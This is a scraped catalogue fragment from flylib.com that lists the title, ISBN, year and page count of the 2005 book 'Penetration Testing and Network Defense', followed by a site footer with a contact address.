     < Day Day Up > 


    Penetration Testing and Network Defense
    Penetration Testing and Network Defense
    ISBN: 1587052083
    EAN: 2147483647
    Year: 2005
    Pages: 209

    flylib.com © 2008-2017.
    If you may any questions please contact us: flylib@qtcs.net